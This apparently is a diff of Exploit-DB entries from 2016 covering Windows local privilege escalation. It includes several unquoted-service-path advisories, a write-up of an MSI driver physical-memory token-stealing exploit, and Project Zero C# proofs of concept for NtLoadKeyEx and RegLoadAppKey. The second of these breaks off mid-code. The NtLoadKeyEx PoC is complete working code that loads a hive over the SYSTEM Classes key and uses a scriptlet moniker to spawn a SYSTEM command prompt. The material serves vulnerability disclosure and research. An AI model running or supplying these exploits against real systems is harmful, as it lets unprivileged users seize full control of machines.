# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.netdrive.net/
# Software Link: http://www.netdrive.net/download
# Version: 2.6.12
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
NetDrive installs a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc Netdrive2_Service_Netdrive2
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Netdrive2_Service_Netdrive2
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NetDrive2\nd2svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NetDrive2_Service_NetDrive2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.

27
platforms/windows/local/40425.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Elantech Smart-Pad Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Exploit Author: zaeek@protonmail.com
# Vendor Homepage: http://www.emc.com.tw/eng/
# Version: 11.9.0.0
# Tested on: Windows 7 64bit
====Description====
Elantech Smart-Pad Service lacks of quotes in the filepath, causing it to be a potential vector of privilege escalation attack.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
====Proof-of-Concept====
C:\>sc qc ETDService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ETDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Elan Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

93
platforms/windows/local/40426.txt Executable file
View file

@ -0,0 +1,93 @@
#Exploit Title: MSI NTIOLib.sys, WinIO.sys local privilege escalation
#Date: 2016-09-26
#Exploit Author: ReWolf
#Vendor Homepage: http://www.msi.com
#Version: too many
#Tested on: Windows 10 x64 (TH2, RS1)
Full description: http://blog.rewolf.pl/blog/?p=1630
Exploit github repo: https://github.com/rwfpl/rewolf-msi-exploit
EDB PoC Mirror:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40426.zip
NTIOLib.sys is installed with a few different MSI utilities that are part of the software package for MSI motherboards and graphic cards. WinIO.sys is completely different driver and is installed with Dragon Gaming Center application, which is part of the software package for MSI notebooks. Since both drivers expose physical memory access to the unprivileged users, I decided to put it into one report (Ill describe the technical differences later). Actually when I was verifying list of affected software, Ive found third driver that is doing exactly the same thing, just have a bit different interface and name (RTCore32.sys / RTCore64.sys).
Affected software:
NTIOLib.sys / NTIOLib_X64.sys
MSI FastBoot
MSI Command Center
MSI Live Update
MSI Gaming APP
MSI Super Charger
MSI Dragon Center
WinIO.sys / WinIO64.sys
MSI Dragon Gaming Center
MSI Dragon Center
RTCore32.sys / RTCore64.sys
MSI Afterburner
NTIOLib functionality exposed through IOCTLs:
read/write physical memory (using MmMapIoSpace)
read write MSR registers (using rdmsr/wrmsr opcodes)
read PMC register (using rdpmc opcode)
in/out port operations
HalGetBusDataByOffset / HalSetBusDataByOffset
WinIO functionality exposed through IOCTLs:
read/write physical memory (ZwMapViewOfSection of “\\Device\\PhysicalMemory”)
in/out port operations
RTCore functionality exposed through IOCTLs:
read/write physical memory (ZwMapViewOfSection of “\\Device\\PhysicalMemory”)
read write MSR registers (using rdmsr/wrmsr opcodes)
in/out port operations
HalGetBusDataByOffset / HalSetBusDataByOffset
It appears that RTCore driver is kind of hybrid between NTIOLib and WinIO. Its also worth noting that WinIO driver is just compiled (and signed by MSI) version of the code that can be found here: http://www.internals.com/utilities_main.htm.
UPDATE: RTCore driver is part of RivaTuner software, so all OEM branded RivaTuner clones are vulnerable (https://twitter.com/equilibriumuk/status/780367990160326656).
Some of the mentioned applications load vulnerable driver on demand, but some of them loads the driver with service startup and keeps it loaded for the whole time, thus exploitation is rather trivial. I havent thoroughly inspected all MSI applications, since its not really possible (different version of the software for different hardware, multiple installers etc), so its very probable that my list doesnt cover all cases. Generally if someone owns any MSI hardware, its good to check if any of above drivers (or with similar name) is loaded, and if yes, just remove the application that installed it.
Disclosure timeline:
30.05.2016 sent e-mail notification to the addresses: security@msi.com, secure@msi.com, bugs@msi.com (none of those is valid, but it was worth trying)
31.05.2016 03.06.2016 tried reporting through official support channel, without any luck, final reply:
Please dont worry about it and the software files are secure.Anyway,we will send the information to relative department.Thanks!
03.06.2016 tried contact through a friend from security team of some super-secret big corporation also without luck
26.09.2016 full disclosure
Technical details & PoC
After ASMMAP disclosure, Ive read that the exploitation of this kind of vulnerability is rather easy:
This can be done by scanning for EPROCESS structures within memory and identifying one, then jumping through the linked list to find your target process and a known SYSTEM process (e.g. lsass), then duplicating the Token field across to elevate your process. This part isnt really that novel or interesting, so I wont go into it here.
Since I dont have much experience in this area, I decided to try above method and see if the exploitation is really straightforward. Ive started randomly poking with physical pages, just to see how it behaves. My first observation was, that the WinIO driver is a lot more stable than NTIOLib, it probably stems from the method that is used to expose physical memory to the user application (MmMapIoSpace vs ZwMapViewOfSection). NTIOLib tends to BSODs sometimes, especially if the accessed addresses are random (aligned to the 0x1000). My second observation was, that NTIOLib becomes quite stable if the memory is accessed sequentially (page by page). This is actually good, because EPROCESS search is sequential activity.
EPROCESS structures are allocated with Proc pool tag, this is the first indicator that EPROCESS search algorithm will look for. Each memory chunk starts with POOL_HEADER structure, followed by a few OBJECT_HEADER_xxx_INFO structures and finally by the OBJECT_HEADER. OBJECT_HEADER.Body is the actual EPROCESS. More details can be found in Uninformed Journal or in WRK (ObpAllocateObject, \wrk\base\ntos\ob\obcreate.c). On Windows 10 x64 (TH2, RS1) all those structures sums up to 0x80 bytes. To successfully execute local privilege escalation, I need to locate EPROCESS structure of 2 processes. One will be some system process and the second should be the process that privileges are supposed to be escalated. For system process I chose wininit.exe, and the escalated process will be the current process. Having names and PIDs of chosen processes, exploit can proceed to final EPROCESS verification (checks of UniqueProcessId and ImageFileName fields).
With above information it is possible to test initial exploit it is very slow, so slow that I havent wait till it finish. The slowdown comes from accessing addresses that are reserved for hardware IO devices. Those reserved memory ranges will vary from one machine to another, so its required to find them out and skip during EPROCESS search. The easiest method to get those ranges is calling NtQuerySystemInformation with SuperfetchInformationClass (http://www.alex-ionescu.com/?p=51), however this call requires elevation, so it has no use in this case. Second place where this information can be obtained is WMI (CIMV2, Win32_DeviceMemoryAddress). This method is not as accurate as SuperfetchInformationClass, but I decided to use it in my PoC. Information returned on VMware test system were 100% accurate, and the slowdown disappeared, however I was still experiencing slowdown on my host machine. I come up with really simple and ugly solution: Ive added hardcoded <0xF0000000-0xFFFFFFFF> region to the ranges returned from WMI. At this point PoC successfully runs on both VMware test machine (Win10 x64 TH2) and my host machine (Win10 x64 RS1):
Whoami: secret\user
Found wininit.exe PID: 000002D8
Looking for wininit.exe EPROCESS...
EPROCESS: wininit.exe, token: FFFF8A06105A006B, PID: 2D8
Stealing token...
Stolen token: FFFF8A06105A006B
Looking for MsiExploit.exe EPROCESS...
EPROCESS: MsiExploit.exe, token: FFFF8A0642E3B957, PID: CAA8
Reusing token...
Whoami: nt authority\system
Over-engineered version of PoC can be found on github (Visual Studio 2015 recommended):
https://github.com/rwfpl/rewolf-msi-exploit
It has hard-coded EPROCESS field offsets, so it only works on Win10 x64 TH2/RS1. PoC should work with any version of NTIOLib and WinIO drivers. I havent fully analyzed RTCore interface due to the fact, that I found it just today, so obviously it is not included in PoC.

41
platforms/windows/local/40427.txt Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: Iperius Remote 1.7.0 Unquoted Service Path Elevation of Privilege
# Date: 26/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.iperiusremote.com
# Software Link: https://www.iperiusremote.com/download.aspx
# Version: Software Version 1.7.0
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
Iperius Remote allows the user to install the application as a service with an unquoted service path running with SYSTEM privileges. It is important to note that the application installs itself as a service in the same location where the setup file in ran from. Provided that the end user initiates the installation from a directory with spaces in it's path, this could allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc IperiusRemotesvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IperiusRemotesvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Random Folder With Spaces\IperiusRemote.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IperiusRemote Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.

62
platforms/windows/local/40428.txt Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: Macro Expert 4.0 Multiple Elevation of Privilege
# Date: 26/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.macro-expert.com/
# Software Link: http://www.macro-expert.com/download.htm
# Version: Software Version 4.0
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
Macro Expert installs as a service with an unquoted service path running with SYSTEM
privileges. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. Additionally the
default installation path suffers from weak folder permission which an unauthorized user
in the BUILTIN\Users group could take advantage of.
2. Proof
C:\Program Files\GrassSoft>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Macro Expert
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\program files\grasssoft\macro expert\MacroService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Macro Expert
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Program Files\GrassSoft>cacls "Macro Expert"
C:\Program Files\GrassSoft\Macro Expert BUILTIN\Users:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.

488
platforms/windows/local/40429.cs Executable file
View file

@ -0,0 +1,488 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=865
Windows: NtLoadKeyEx User Hive Attachment Point EoP
Platform: Windows 10 10586 (32/64) and 8.1 Update 2, not tested Windows 7
Class: Elevation of Privilege
Summary:
The NtLoadKeyEx system call allows an unprivileged user to load registry hives outside of the \Registry\A hidden attachment point which can be used to elevate privileges.
Description:
Windows Vista and above support loading per-user registry hives. Normally calling NtLoadKeyEx would require Backup/Restore privileges to do this making it useless for the average user.. However per-user hives are permitted from a normal user. When calling the Win32 API RegLoadAppKey the hive is loaded under \Registry\A which is a hidden attachment key and doesnt provide any obvious benefit from an EoP perspective (especially as the root name is a random GUID). However it turns out that you can load the per-user hive to any attachment point such as \Registry\User or \Registry\Machine. Interestingly this works even as a sandboxed user, so it would be an escape out of EPM/Edge/Bits of Chrome etc.
So how can we exploit this? The simplest way Ive found is to register the hive as the local system "Classes" key. This isnt registered by default, however a quick inspection indicates that local system does indeed refer to this key when trying to access COM registration information. So by putting an appropriate registration in \Registry\User\S-1-5-18_Classes it will be loaded as a local system component and privileged execution is achieved.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile it first. It uses the issue with NtLoadKeyEx to map a custom hive over the local systems Classes key. It then registers a type library which is loaded when WinLogon is signaled. I signal WinLogon by locking the screen. It abuses the fact that registered type library paths when passed to LoadTypeLib can be a COM moniker. So I register a COM scriptlet moniker which will be bound when LoadTypeLib parses it, this causes a local scriptlet file to be executed which respawns the original binary to spawn an interactive command prompt. By doing it this way it works on 32 bit and 64 bit without any changes.
Note that it doesnt need to use the Lock Screen, just this was the first technique I found. Many system services are loading data out of the registry hive, it would just be a case of finding something which could be trivially triggered by the application. In any case imo the bug is the behaviour of NtLoadKeyEx, not how I exploit it.
1) Compile the C# source code file.
2) Execute the PoC executable as a normal user.
3) The PoC should lock the screen. Youll need to unlock again (do not log out).
4) If successful a system level command prompt should be available on the users desktop when you unlock.
Expected Result:
You cant create a per-user hive outside of the hidden attachment point.
Observed Result:
Well obviously you can.
*/
using Microsoft.Win32;
using Microsoft.Win32.SafeHandles;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace Poc_NtLoadKeyEx_EoP
{
class Program
{
[Flags]
public enum AttributeFlags : uint
{
None = 0,
Inherit = 0x00000002,
Permanent = 0x00000010,
Exclusive = 0x00000020,
CaseInsensitive = 0x00000040,
OpenIf = 0x00000080,
OpenLink = 0x00000100,
KernelHandle = 0x00000200,
ForceAccessCheck = 0x00000400,
IgnoreImpersonatedDevicemap = 0x00000800,
DontReparse = 0x00001000,
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class UnicodeString
{
ushort Length;
ushort MaximumLength;
[MarshalAs(UnmanagedType.LPWStr)]
string Buffer;
public UnicodeString(string str)
{
Length = (ushort)(str.Length * 2);
MaximumLength = (ushort)((str.Length * 2) + 1);
Buffer = str;
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class ObjectAttributes : IDisposable
{
int Length;
IntPtr RootDirectory;
IntPtr ObjectName;
AttributeFlags Attributes;
IntPtr SecurityDescriptor;
IntPtr SecurityQualityOfService;
private static IntPtr AllocStruct(object s)
{
int size = Marshal.SizeOf(s);
IntPtr ret = Marshal.AllocHGlobal(size);
Marshal.StructureToPtr(s, ret, false);
return ret;
}
private static void FreeStruct(ref IntPtr p, Type struct_type)
{
Marshal.DestroyStructure(p, struct_type);
Marshal.FreeHGlobal(p);
p = IntPtr.Zero;
}
public ObjectAttributes(string object_name)
{
Length = Marshal.SizeOf(this);
if (object_name != null)
{
ObjectName = AllocStruct(new UnicodeString(object_name));
}
Attributes = AttributeFlags.None;
}
public void Dispose()
{
if (ObjectName != IntPtr.Zero)
{
FreeStruct(ref ObjectName, typeof(UnicodeString));
}
GC.SuppressFinalize(this);
}
~ObjectAttributes()
{
Dispose();
}
}
[Flags]
public enum LoadKeyFlags
{
None = 0,
AppKey = 0x10,
Exclusive = 0x20,
Unknown800 = 0x800,
}
[Flags]
public enum GenericAccessRights : uint
{
None = 0,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
public class NtException : ExternalException
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string modulename);
[Flags]
enum FormatFlags
{
AllocateBuffer = 0x00000100,
FromHModule = 0x00000800,
FromSystem = 0x00001000,
IgnoreInserts = 0x00000200
}
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int FormatMessage(
FormatFlags dwFlags,
IntPtr lpSource,
int dwMessageId,
int dwLanguageId,
out IntPtr lpBuffer,
int nSize,
IntPtr Arguments
);
[DllImport("kernel32.dll")]
private static extern IntPtr LocalFree(IntPtr p);
private static string StatusToString(int status)
{
IntPtr buffer = IntPtr.Zero;
try
{
if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
{
return Marshal.PtrToStringUni(buffer);
}
}
finally
{
if (buffer != IntPtr.Zero)
{
LocalFree(buffer);
}
}
return String.Format("Unknown Error: 0x{0:X08}", status);
}
public NtException(int status) : base(StatusToString(status))
{
}
}
public static void StatusToNtException(int status)
{
if (status < 0)
{
throw new NtException(status);
}
}
[DllImport("ntdll.dll")]
public static extern int NtLoadKeyEx(ObjectAttributes DestinationName, ObjectAttributes FileName, LoadKeyFlags Flags,
IntPtr TrustKeyHandle, IntPtr EventHandle, GenericAccessRights DesiredAccess, out SafeRegistryHandle KeyHandle, int Unused);
static string scriptlet_code = @"<?xml version='1.0'?>
<package>
<component id='giffile'>
<registration
description='Dummy'
progid='giffile'
version='1.00'
remotable='True'>
</registration>
<script language='JScript'>
<![CDATA[
new ActiveXObject('Wscript.Shell').exec('%CMDLINE%');
]]>
</script>
</component>
</package>
";
public enum TokenInformationClass
{
TokenSessionId = 12
}
[DllImport("ntdll.dll")]
public static extern int NtClose(IntPtr handle);
[DllImport("ntdll.dll", CharSet = CharSet.Unicode)]
public static extern int NtOpenProcessTokenEx(
IntPtr ProcessHandle,
GenericAccessRights DesiredAccess,
AttributeFlags HandleAttributes,
out IntPtr TokenHandle);
public sealed class SafeKernelObjectHandle
: SafeHandleZeroOrMinusOneIsInvalid
{
public SafeKernelObjectHandle()
: base(true)
{
}
public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)
: base(owns_handle)
{
SetHandle(handle);
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
NtClose(this.handle);
this.handle = IntPtr.Zero;
return true;
}
return false;
}
}
public enum TokenType
{
Primary = 1,
Impersonation = 2
}
[DllImport("ntdll.dll", CharSet = CharSet.Unicode)]
public static extern int NtDuplicateToken(
IntPtr ExistingTokenHandle,
GenericAccessRights DesiredAccess,
ObjectAttributes ObjectAttributes,
bool EffectiveOnly,
TokenType TokenType,
out IntPtr NewTokenHandle
);
public static SafeKernelObjectHandle DuplicateToken(SafeKernelObjectHandle existing_token)
{
IntPtr new_token;
using (ObjectAttributes obja = new ObjectAttributes(null))
{
StatusToNtException(NtDuplicateToken(existing_token.DangerousGetHandle(),
GenericAccessRights.MaximumAllowed, obja, false, TokenType.Primary, out new_token));
return new SafeKernelObjectHandle(new_token, true);
}
}
public static SafeKernelObjectHandle OpenProcessToken()
{
IntPtr new_token;
StatusToNtException(NtOpenProcessTokenEx(new IntPtr(-1),
GenericAccessRights.MaximumAllowed, AttributeFlags.None, out new_token));
using (SafeKernelObjectHandle ret = new SafeKernelObjectHandle(new_token, true))
{
return DuplicateToken(ret);
}
}
[DllImport("ntdll.dll")]
public static extern int NtSetInformationToken(
SafeKernelObjectHandle TokenHandle,
TokenInformationClass TokenInformationClass,
byte[] TokenInformation,
int TokenInformationLength);
public static void SetTokenSessionId(SafeKernelObjectHandle token, int session_id)
{
byte[] buffer = BitConverter.GetBytes(session_id);
NtSetInformationToken(token, TokenInformationClass.TokenSessionId,
buffer, buffer.Length);
}
static Tuple<EventWaitHandle, EventWaitHandle> GetEvents()
{
EventWaitHandle user_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_user_wait");
EventWaitHandle sys_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_sys_wait");
return new Tuple<EventWaitHandle, EventWaitHandle>(user_ev, sys_ev);
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
internal struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
enum CreateProcessFlags
{
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
CREATE_NEW_CONSOLE = 0x00000010,
CREATE_NEW_PROCESS_GROUP = 0x00000200,
CREATE_NO_WINDOW = 0x08000000,
CREATE_PROTECTED_PROCESS = 0x00040000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
CREATE_SEPARATE_WOW_VDM = 0x00000800,
CREATE_SHARED_WOW_VDM = 0x00001000,
CREATE_SUSPENDED = 0x00000004,
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
DEBUG_PROCESS = 0x00000001,
DETACHED_PROCESS = 0x00000008,
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
INHERIT_PARENT_AFFINITY = 0x00010000
}
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern bool CreateProcessAsUser(
IntPtr hToken,
string lpApplicationName,
string lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
static void SpawnInteractiveCmd(int sessionid)
{
Tuple<EventWaitHandle, EventWaitHandle> events = GetEvents();
Console.WriteLine("Got Events");
events.Item1.Set();
events.Item2.WaitOne();
SafeKernelObjectHandle token = OpenProcessToken();
SetTokenSessionId(token, sessionid);
STARTUPINFO startInfo = new STARTUPINFO();
startInfo.cb = Marshal.SizeOf(startInfo);
PROCESS_INFORMATION procInfo;
CreateProcessAsUser(token.DangerousGetHandle(), null, "cmd.exe",
IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref startInfo, out procInfo);
}
[DllImport("user32.dll")]
static extern bool LockWorkStation();
static void DoExploit()
{
Console.WriteLine("{0}", Assembly.GetCallingAssembly().Location);
Tuple<EventWaitHandle, EventWaitHandle> events = GetEvents();
string cmdline = String.Format(@"""{0}"" {1}",
Assembly.GetCallingAssembly().Location.Replace('\\', '/'), Process.GetCurrentProcess().SessionId);
string scriptlet_path = Path.GetFullPath("dummy.sct");
File.WriteAllText(scriptlet_path, scriptlet_code.Replace("%CMDLINE%", cmdline), Encoding.ASCII);
Console.WriteLine("{0}", scriptlet_path);
string scriptlet_url = "script:" + new Uri(scriptlet_path).AbsoluteUri;
Console.WriteLine("{0}", scriptlet_url);
string reg_name = @"\Registry\User\S-1-5-18_Classes";
string path = @"\??\" + Path.GetFullPath("dummy.hiv");
File.Delete("dummy.hiv");
ObjectAttributes KeyName = new ObjectAttributes(reg_name);
ObjectAttributes FileName = new ObjectAttributes(path);
SafeRegistryHandle keyHandle;
StatusToNtException(NtLoadKeyEx(KeyName,
FileName, LoadKeyFlags.AppKey, IntPtr.Zero,
IntPtr.Zero, GenericAccessRights.GenericAll, out keyHandle, 0));
RegistryKey key = RegistryKey.FromHandle(keyHandle);
RegistryKey typelib_key = key.CreateSubKey("TypeLib").CreateSubKey("{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}").CreateSubKey("2.0").CreateSubKey("0");
typelib_key.CreateSubKey("win32").SetValue(null, scriptlet_url);
typelib_key.CreateSubKey("win64").SetValue(null, scriptlet_url);
Console.WriteLine("Handle: {0} - Key {1} - Path {2}", keyHandle.DangerousGetHandle(), reg_name, path);
Console.WriteLine("Lock screen and re-login.");
LockWorkStation();
events.Item1.WaitOne();
typelib_key.DeleteSubKey("win32");
typelib_key.DeleteSubKey("win64");
File.Delete(scriptlet_path);
typelib_key.Close();
key.Close();
events.Item2.Set();
}
static void Main(string[] args)
{
try
{
if (args.Length > 0)
{
SpawnInteractiveCmd(int.Parse(args[0]));
}
else
{
DoExploit();
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
}
}

286
platforms/windows/local/40430.cs Executable file
View file

@ -0,0 +1,286 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=870
Windows: RegLoadAppKey Hive Enumeration EoP
Platform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
RegLoadAppKey is documented to load keys in a location which cant be enumerated and also non-guessable. However its possible to enumerate loaded hives and find ones which can be written to which might lead to EoP.
Description:
The RegLoadAppKey API loads a user specified hive without requiring administrator privileges. This is used to provide per-application registry hives and is used extensively by Immersive Applications but also some system services. The MSDN documentation states that the keys cannot be enumerated, the only way to get access to the same hive is by opening the file again using RegLoadAppKey which requires having suitable permissions on the target hive file. It also ensures that you cant guess the loaded key name by generating a random GUID which is going to be pretty difficult to brute-force.
This in part seems to be true if you try and open directly the attachment point of \Registry\A. That fails with access denied (Ive not looked into the kernel to work out what actually does this check). However theres no protection from recursive enumeration, so we can open \Registry for read access, then open A relative to that key. With this we can now enumerate all the loaded per-app hives.
What we can do with this is less clear cut as it depends on what is using application hives at the current point in time. Immersive applications use per-app hives for their activation data and settings. While the activation hive seems to be correctly locked to only the user, the settings are not. As the default DACL for the settings hive is granting Everyone and ALL_APPLICATION_PACKAGES full access this means an Immersive Application could read/write settings data from any other running application. This even works between users on the same machine, so for example on a Terminal Server one user could read the settings of another users running Immersive Applications. At the least this is an information disclosure issue, but it might Edge content processes to access the settings of the main Edge process (which runs under a different package SID).
A few system services also use per-app hives, including the Background Tasks Infrastructure Service and Program Compatibility Assistant. The tasks hive is locked for write access to normal users although it can be read, while the PCA hive is fully writable by any user on the system (the hives file isnt even readable by a normal user, let alone writable). Ive not investigated if its possible to abuse this access to elevate privileges, but it certainly seems a possibility. There might be other vulnerable services which could be exploited, however Ive not investigated much further on this.
In the end its clear that theres an assumption being made that as these hives shouldnt be enumerable then thats enough security to prevent abuse. This is especially true with the settings hives for immersive applications, the file DACL is locked to the package SID however the hive itself is allowed for all access to any package and relies on the fact that an application couldnt open a new handle to it as the security boundary.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile it first.
1) Compile the C# source code file.
2) Execute the PoC executable as a normal user.
3) The PoC should print that its found some registry hives which it shouldnt be able to enumerate.
4) It should also say its found the PCA hive as well.
Expected Result:
You cant enumerate per-app registry hives.
Observed Result:
The hives can be enumerated and also some of them can be written to.
*/
using Microsoft.Win32;
using Microsoft.Win32.SafeHandles;
using System;
using System.Runtime.InteropServices;
namespace Poc_RegLoadAppKey_EoP
{
class Program
{
[Flags]
enum AttributeFlags : uint
{
None = 0,
Inherit = 0x00000002,
Permanent = 0x00000010,
Exclusive = 0x00000020,
CaseInsensitive = 0x00000040,
OpenIf = 0x00000080,
OpenLink = 0x00000100,
KernelHandle = 0x00000200,
ForceAccessCheck = 0x00000400,
IgnoreImpersonatedDevicemap = 0x00000800,
DontReparse = 0x00001000,
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
sealed class UnicodeString
{
ushort Length;
ushort MaximumLength;
[MarshalAs(UnmanagedType.LPWStr)]
string Buffer;
public UnicodeString(string str)
{
Length = (ushort)(str.Length * 2);
MaximumLength = (ushort)((str.Length * 2) + 1);
Buffer = str;
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
sealed class ObjectAttributes : IDisposable
{
int Length;
IntPtr RootDirectory;
IntPtr ObjectName;
AttributeFlags Attributes;
IntPtr SecurityDescriptor;
IntPtr SecurityQualityOfService;
private static IntPtr AllocStruct(object s)
{
int size = Marshal.SizeOf(s);
IntPtr ret = Marshal.AllocHGlobal(size);
Marshal.StructureToPtr(s, ret, false);
return ret;
}
private static void FreeStruct(ref IntPtr p, Type struct_type)
{
Marshal.DestroyStructure(p, struct_type);
Marshal.FreeHGlobal(p);
p = IntPtr.Zero;
}
public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr root)
{
Length = Marshal.SizeOf(this);
if (object_name != null)
{
ObjectName = AllocStruct(new UnicodeString(object_name));
}
Attributes = flags;
RootDirectory = root;
}
public void Dispose()
{
if (ObjectName != IntPtr.Zero)
{
FreeStruct(ref ObjectName, typeof(UnicodeString));
}
GC.SuppressFinalize(this);
}
~ObjectAttributes()
{
Dispose();
}
}
[Flags]
enum GenericAccessRights : uint
{
None = 0,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
class NtException : ExternalException
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string modulename);
[Flags]
enum FormatFlags
{
AllocateBuffer = 0x00000100,
FromHModule = 0x00000800,
FromSystem = 0x00001000,
